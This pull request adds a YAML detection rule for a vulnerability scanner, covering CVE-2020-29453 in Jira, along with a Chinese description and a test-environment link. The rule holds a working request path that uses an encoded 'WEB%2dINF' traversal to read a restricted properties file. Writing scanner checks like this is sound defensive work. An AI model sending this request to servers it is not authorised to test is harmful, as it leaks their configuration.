### PR TITLE
Create jira-cve-2020-29453.yml

### DIFF
--- a/pocs/jira-cve-2020-29453.yml
+++ b/pocs/jira-cve-2020-29453.yml
@@ -1,0 +1,11 @@
+name: poc-yaml-jira-cve-2020-29453
+rules:
+  - method: GET
+    path: "/s/whatever/_/WEB%2dINF/classes/jira-application.properties"
+    expression: |
+      response.status == 200 && response.body.bcontains(b"jira.home")
+detail:
+  author: shadowsock5(https://github.com/shadowsock5)
+  Affected Version: "version < 8.5.11, 8.6.0 ≤ version < 8.13.3, 8.14.0 ≤ version < 8.15.0"
+  links:
+    - https://jira.atlassian.com/browse/JRASERVER-72014


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Jira信息泄露漏洞，WEB-INF和META-INF目录下的受限文件读取。

## 测试环境
https://github.com/vulhub/vulhub/tree/master/jira/CVE-2019-11581

## 备注
version < 8.5.11
8.6.0 ≤ version < 8.13.3
8.14.0 ≤ version < 8.15.0